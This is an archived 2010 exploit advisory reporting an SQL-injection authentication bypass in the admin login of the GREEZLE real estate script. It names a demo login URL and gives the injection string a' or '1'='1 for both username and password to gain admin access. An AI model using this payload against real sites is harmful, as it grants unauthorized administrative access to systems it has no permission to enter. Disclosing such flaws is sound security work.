Global Real Estate Agent Site Authentication Bypass

2010-06-12T00:00:00
ID PACKETSTORM:90525
Type packetstorm
Reporter L0rd CrusAd3r
Modified 2010-06-12T00:00:00

Description

                                        
                                            `Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]  
Exploit Title: GREEZLE - Global Real Estate Agent Site Authentication ByPass  
Published: 2010-06-09  
Vendor url:http://www.ifstudio.org/greezla/  
Price:99$  
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue™®, S1ayer and to all ICW members  
#############################################################################################################################################################################  
  
GREEZLE - Global Real Estate Agent Site Authentication ByPass  
  
#############################################################################################################################################################################  
  
Description:   
  
GREEZLE is an easy in use site which allows to sell online any real estate objects.   
Visitors are able to browse, search and view properties.  
It allows you to create agent accounts, who can also sell any real estate objects at a fee you charge.  
###############################################################################################################################################################################  
  
Vulnerability:  
  
*Authentication Bypass found  
  
The Provided Script as Sqli Vulnerability in Admin Login page  
  
DEMO URL : http://properties.ifstudio.org/en/login  
  
Use the string a' or '1'='1 for Username and Password to gain access  
  
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------  
# 0day no more #  
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------  
  
  
################################################################################################################################################################################  
`